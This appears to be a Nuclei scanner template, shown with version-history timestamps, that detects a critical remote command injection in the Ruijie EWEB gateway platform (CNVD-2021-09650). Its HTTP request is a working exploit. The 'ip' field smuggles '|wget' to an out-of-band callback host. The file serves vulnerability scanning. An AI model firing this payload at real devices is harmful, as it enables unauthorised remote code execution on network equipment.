nuclei-templates/http/cnvd/2021/CNVD-2021-09650.yaml

35 lines
1.2 KiB
YAML
Raw Normal View History

2022-02-25 16:33:59 +00:00
id: CNVD-2021-09650
info:
2022-11-01 13:21:02 +00:00
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo,pikpikcu
2022-02-25 16:33:59 +00:00
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
2022-11-01 13:21:02 +00:00
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
2024-01-14 09:21:50 +00:00
tags: cnvd,cnvd2021,ruijie,rce
2022-02-25 16:33:59 +00:00
http:
2022-02-25 16:33:59 +00:00
- raw:
- |
POST /guest_auth/guestIsUp.php
Host: {{Hostname}}
2022-02-26 21:23:26 +00:00
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
2022-02-25 16:33:59 +00:00
2022-02-26 21:23:26 +00:00
unsafe: true
2022-02-25 16:33:59 +00:00
matchers:
2022-02-26 21:23:26 +00:00
- type: word
part: interactsh_protocol
name: http
words:
- "http"
# digest: 490a0046304402202d6b248201cb2194c4824f5ec119cef5b993674b0ca7deb993bbb91ce2c4f4e002206eb8515733c686fabf67c25c8b5a3cb2713cf95ec51cd8e696634247b0cb688a:922c64590222798bb761d5b6d8e72950